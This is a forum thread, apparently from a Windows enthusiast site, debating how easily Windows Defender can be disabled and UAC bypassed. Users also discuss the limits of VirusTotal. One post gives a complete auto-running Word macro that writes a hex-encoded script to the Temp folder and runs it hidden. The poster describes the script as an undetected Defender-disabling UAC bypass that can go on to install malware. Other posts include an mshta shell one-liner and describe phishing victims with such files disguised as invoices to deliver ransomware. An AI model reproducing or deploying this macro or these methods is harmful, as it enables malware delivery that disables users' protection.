If virus total doesn't detect the threat then what's anything to do to protect you? If it's already on the system and is executing without detection it could kill pretty much whatever it wants. For another av the virus could take ownership and force delete .sys files for the existing antivirus making windows bsod on reboot. If it's spyware and you have a firewall it could still loopback through firefox...
VirusTotal is a bit deceiving and should never be used as the sole trust factor, as most products featured don't actually trigger their heuristic/hips/sandboxing when being batch-run in vm's. 0-day and such require hybrid analysis / sandboxing - there are several choices available online now (each with their pros and cons, rip anubis). Anyway, that's beside the point. It's not considered a threat because it is not a threat. You can't expect others being more catholic than the pope. "UAC is not a security boundary" -Microsoft But actually proper AVs installed on real machines have heuristics engines that if not blocking, at least will alert you before executing cmd from notepad from example. And you can't "pull the rug" from other AVs so easily - almost all of them have quite powerful defenses via kernel drivers, and not just one, but multiple redundancies. It takes having access to an exploitable signed driver to even begin attacking them. What's actually hilarious - or very sad - depending from which point you are looking, is that Defender immediately goes mad when executing stuff like this: Code: mshta "javascript:window.close(new ActiveXObject('WScript.Shell').Run('regedit.exe -m', 1, 'False'))" Yet it's completely fine with stuff we've showcased in this thread..
Relying on virus total results is a bad idea, it does not include real-time execution detection and behavioral detection, it only scans a file in a most basic way. A virus can be encrypted and hidden in a file, the virus total will flag it 100% clean, but the antivirus real-time protection will immediately block this threat when this software will try to extract and execute the malicious lines. For example, today I tested Kaspersky free against the methods to bypass WD and UAC posted in page number 5 in this thread, it blocked the UAC bypass methods instantly, it doesn't mean that it'll surely protect against every UAC bypass but apparently they have a database for such bypasses and they detect it. WD should have blocked the UAC bypasses and for the love of god at least .chm help file method but they don't care, others AV do, that's the whole point of this thread. edit - just saw that BAU posted above too.
More troublesome is that there are dozens of so-called "penetration testing" toolkits available to automate multiple methods until succeeded - most dll-injection/msi/cmstplua/ctf/wnf ones work just fine and not even kaspersky will cover all of them.. and why should they? why should a 3rd party fix what microsoft themselves don't "elevate" (pun-intended) as being an issue? Nobody even bothers reporting UAC bypasses anymore, and stuff only ever gets fixed when tangentially hit by a larger issue
Not only is this true, but it becomes more true every year. It is impossible to replicate a real bare metal system and the actual attack vector used at the point of infection for the torrent of samples coming into VT so the results should be thought of a piece of the total picture, not a conclusive answer.
example doc macro Code: Private Sub Document_Open() Dim i As Long Dim nFileNum As Integer Dim sFilename As String Dim strBytes As String Dim arrBytes As Variant sFilename = Environ("Temp") & "\d.cmd" strBytes = "00 00 00 ... 00 00 00" strBytes = strBytes & " 00 00 00 ... 00 00 00" arrBytes = Split(strBytes) nFileNum = FreeFile Open sFilename For Binary Lock Read Write As #nFileNum For i = LBound(arrBytes) To UBound(arrBytes) Put #nFileNum, , CByte("&H" & arrBytes(i)) Next i Close #nFileNum Call Shell("cmd.exe /C ""%TMP%\d.cmd""", vbHide) End Sub In strBytes is d.cmd as hex. In d.cmd is disable defender (uac baypass included). Undetected. Functional under admin account. The script can continue by installing malware, the defender will already be disabled.
Installed windows 10 2004, it seems like WD have been improved a bit to deal with unwanted applications. I noticed some changes in notifications and warnings and the way it deny to run an app. BAU's .cmd and .chm file method, to disable WD still working fine without warning from WD, so yeah it's still the worst AV. Anyone's whole system can be destroyed if someone decides to send such files over email masquerading as invoice file or some other important work related file from some companies, if properly sent, most users will download and run it. Script will then simply proceed to download malware/ransomware and execute it and all of this is very simple to do. It's hard to believe that almost no one in the main stream section seems to talk about such big security flaw specially when now majority runs Windows 10 and most of them rely on WD to protect the system. I tried to inform it to some security related sites but no response from them but they still mention how tamper protection is very effective and will save users from malware's.
Pff. I have assumed April security patch have fixed it since it mentions a s**tload of CVEs regarding elevation of privileges and tokens manipulation, in all windows versions (even discontinued 7 got patched). So the easiest to exploit UAC backdoor still remains, it's "by design" and "wont fix". Tx, Microsoft!
Guys, you've never heard of "Controlled Folder Access" and "Windows Defender Ultra Secure Sandbox Mode"? oddly enough, this is old news! so some kind of script becomes just a futile attempt.
Seems like you haven't tested the awesome effectiveness of the mentioned tricks to disable the Windows defender completely. Controlled Folder Access feature is pointless because script will disable WD and later any process can access anything. I've mentioned previously how the malicious actors can distribute such scripts to general users, easily. Currently my system hardware is not allowing me to test sandbox feature, but I'm pretty sure that most users who do simple browsing on the internet don't (and won't) use sandbox for that. I guess sandbox won't make a difference in order to disable the WD (running inside sandbox) with script.
The same applies to our interaction, read the comments above, learn how to use everything your OS provides in implementing security. Windows 10 provides this option to the average user very well (then you would know what and how the script touch your OS). Instead of spending energy on scripts with no effect (or you are impressing the ignorant) get to know the capabilities of your operating system. PS: Dunning-Kruger Effect.
Here's a picture of me, interacting: Joke aside, first you are disrespecting fellow mdl users in this thread by NOT OPENING A GOD DAMN POWERSHELL AND COPY-PASTING THOSE 100 LINES TO PROVE YOUR POINT then you start throwing personal insults without any provocation. Spoiler: What does google have to say about someone like you? I don't care
@shewolf I've seen in WUMT, WUmgr threads how you interact with users. Anyway I'm attempting last time to reason with you. WD allows saving downloaded files from browsers if you put download folder in controlled folder access. Even if it doesn't, you would need to enable it so you can download things. Once the user click on script, whole protection will be disabled and any process can access anything in those protected folders. Whats there to not understand? Which point is incorrect?